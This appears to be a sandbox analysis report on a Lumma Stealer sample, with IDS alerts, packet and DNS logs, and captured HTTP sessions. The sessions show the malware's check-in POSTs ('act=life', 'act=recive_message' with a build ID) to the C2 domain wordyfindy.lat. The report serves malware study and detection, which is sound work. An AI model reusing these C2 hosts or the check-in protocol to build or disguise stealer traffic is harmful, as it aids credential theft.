                                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                        USER32.dllDefWindowProcW
                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-23T00:11:58.949369+01002058212ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click)1192.168.2.4566471.1.1.153UDP
                                                                                                        2024-12-23T00:12:00.721501+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:01.470847+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:01.470847+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:02.708743+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:03.527568+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:03.527568+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:05.137214+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:18.646834+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:20.849251+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:23.461200+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:24.539100+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449740104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:26.189139+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.19.35443TCP
                                                                                                        2024-12-23T00:12:30.898745+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.19.35443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 23, 2024 00:11:59.492892027 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:11:59.492985964 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:11:59.493144989 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:11:59.496069908 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:11:59.496099949 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:00.721265078 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:00.721501112 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:00.724653006 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:00.724678040 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:00.725018978 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:00.773638010 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:00.778047085 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:00.778146029 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:00.778361082 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:01.470827103 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:01.470926046 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:01.470997095 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:01.472656965 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:01.472697973 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:01.472726107 CET49730443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:01.472743988 CET44349730104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:01.480031013 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:01.480158091 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:01.480264902 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:01.480534077 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:01.480587006 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:02.708508015 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:02.708743095 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:02.709887981 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:02.709923983 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:02.710269928 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:02.711586952 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:02.711586952 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:02.711688042 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.527494907 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.527537107 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.527569056 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.527606010 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.527834892 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.527834892 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.527910948 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.530150890 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.530220985 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.530239105 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.538533926 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.538621902 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.538638115 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.546912909 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.547013044 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.547027111 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.601871014 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.719222069 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.723004103 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.723037958 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.723076105 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.723104000 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.723131895 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.723164082 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.723211050 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.723426104 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.723458052 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.723486900 CET49731443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.723500967 CET44349731104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.912153959 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.912225962 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:03.912343979 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.912822962 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:03.912841082 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:05.137093067 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:05.137213945 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:05.139192104 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:05.139218092 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:05.140235901 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:05.141633987 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:05.141856909 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:05.141916990 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:05.142015934 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:05.142030001 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:17.299036026 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:17.299345016 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:17.299436092 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:17.302747011 CET49732443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:17.302812099 CET44349732104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:17.432063103 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:17.432147026 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:17.432243109 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:17.432615042 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:17.432647943 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:18.646703959 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:18.646833897 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:18.648605108 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:18.648637056 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:18.648971081 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:18.650268078 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:18.650423050 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:18.650466919 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:19.440690041 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:19.440932035 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:19.441132069 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:19.441132069 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:19.627015114 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:19.627042055 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:19.627126932 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:19.627515078 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:19.627526045 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:19.742419958 CET49735443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:19.742469072 CET44349735104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:20.849184036 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:20.849251032 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:20.851979017 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:20.851989031 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:20.852901936 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:20.861929893 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:20.862041950 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:20.862072945 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:20.862159967 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:20.862168074 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:21.817790985 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:21.818002939 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:21.818264961 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:21.818284988 CET49738443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:21.818296909 CET44349738104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:22.246716976 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:22.246836901 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:22.246985912 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:22.247466087 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:22.247505903 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:23.461127996 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:23.461199999 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:23.463130951 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:23.463160038 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:23.463435888 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:23.475147009 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:23.475236893 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:23.475253105 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:24.539091110 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:24.539164066 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:24.539226055 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:24.539463043 CET49740443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:24.539501905 CET44349740104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:24.966101885 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:24.966169119 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:24.966252089 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:24.966532946 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:24.966579914 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.189026117 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.189138889 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.192596912 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.192625999 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.193262100 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.223109961 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.223795891 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.223879099 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.224014997 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.224080086 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.224208117 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.224498034 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.224663019 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.224723101 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.224911928 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.224953890 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.225142956 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.225209951 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.225255013 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.225521088 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.225588083 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.225639105 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.225934029 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.226000071 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.226037979 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.271331072 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.271567106 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.271632910 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.319338083 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.319453001 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.363357067 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.476613998 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.476830959 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:26.476891041 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:26.719999075 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:29.937928915 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:29.938163042 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:29.938240051 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:29.938370943 CET49742443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:29.938425064 CET44349742104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:29.983300924 CET49743443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:29.983350992 CET44349743104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:29.983437061 CET49743443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:29.983762980 CET49743443192.168.2.4104.21.19.35
                                                                                                        Dec 23, 2024 00:12:29.983778954 CET44349743104.21.19.35192.168.2.4
                                                                                                        Dec 23, 2024 00:12:30.898745060 CET49743443192.168.2.4104.21.19.35
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 23, 2024 00:11:58.949368954 CET5664753192.168.2.41.1.1.1
                                                                                                        Dec 23, 2024 00:11:59.163374901 CET53566471.1.1.1192.168.2.4
                                                                                                        Dec 23, 2024 00:11:59.166223049 CET5038953192.168.2.41.1.1.1
                                                                                                        Dec 23, 2024 00:11:59.485234976 CET53503891.1.1.1192.168.2.4
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 23, 2024 00:11:58.949368954 CET192.168.2.41.1.1.10x2da0Standard query (0)bellflamre.clickA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 00:11:59.166223049 CET192.168.2.41.1.1.10x8c51Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 23, 2024 00:11:59.163374901 CET1.1.1.1192.168.2.40x2da0Name error (3)bellflamre.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 00:11:59.485234976 CET1.1.1.1192.168.2.40x8c51No error (0)wordyfindy.lat104.21.19.35A (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 00:11:59.485234976 CET1.1.1.1192.168.2.40x8c51No error (0)wordyfindy.lat172.67.184.241A (IP address)IN (0x0001)false
                                                                                                        • wordyfindy.lat
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.449730104.21.19.354437140C:\Users\user\Desktop\external.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-22 23:12:00 UTC261OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 8
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                        Data Ascii: act=life
                                                                                                        2024-12-22 23:12:01 UTC1125INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:01 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=i5257h27l40f20djlb9seueveh; expires=Thu, 17 Apr 2025 16:58:40 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsqYOztu1%2FnTlfBuWFpNpZGFfCV8RYWLrHkoWlZYTpGNvN9fZSyxvYjvb07W32iHlQpZJj5p7BsDcjDpGyuLe7y3jJ06Hn%2FcaUQSIg9z9GKkyeVB%2B3HDnhm0N1LyFNlTeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cb563cf70f47-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1534&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1903520&cwnd=223&unsent_bytes=0&cid=d6c0c6d01f51527a&ts=767&x=0"
                                                                                                        2024-12-22 23:12:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        2024-12-22 23:12:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.449731104.21.19.354437140C:\Users\user\Desktop\external.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-22 23:12:02 UTC262OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 54
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:02 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d 67 26 6a 3d
                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--alaeljhsfdmg&j=
                                                                                                        2024-12-22 23:12:03 UTC1129INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:03 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=v8ulgol9qn9ur6j7tb4jdjl3q2; expires=Thu, 17 Apr 2025 16:58:42 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFtN7agBvBmIsSdhr%2FuvhMuMlIl3OZW9Du0UZA%2B0HB0w5FCIfZ1FnhfyR%2BVNd6%2B2BxPI9Sb95xaOZoLjB4RqmnbYBvR27R4vipD70%2FM55KoxMoc4myR6QEiqo1bwnHAhLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cb62bacf42c3-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1711&rtt_var=657&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=952&delivery_rate=1706604&cwnd=203&unsent_bytes=0&cid=5fdf5ba964734aa6&ts=826&x=0"
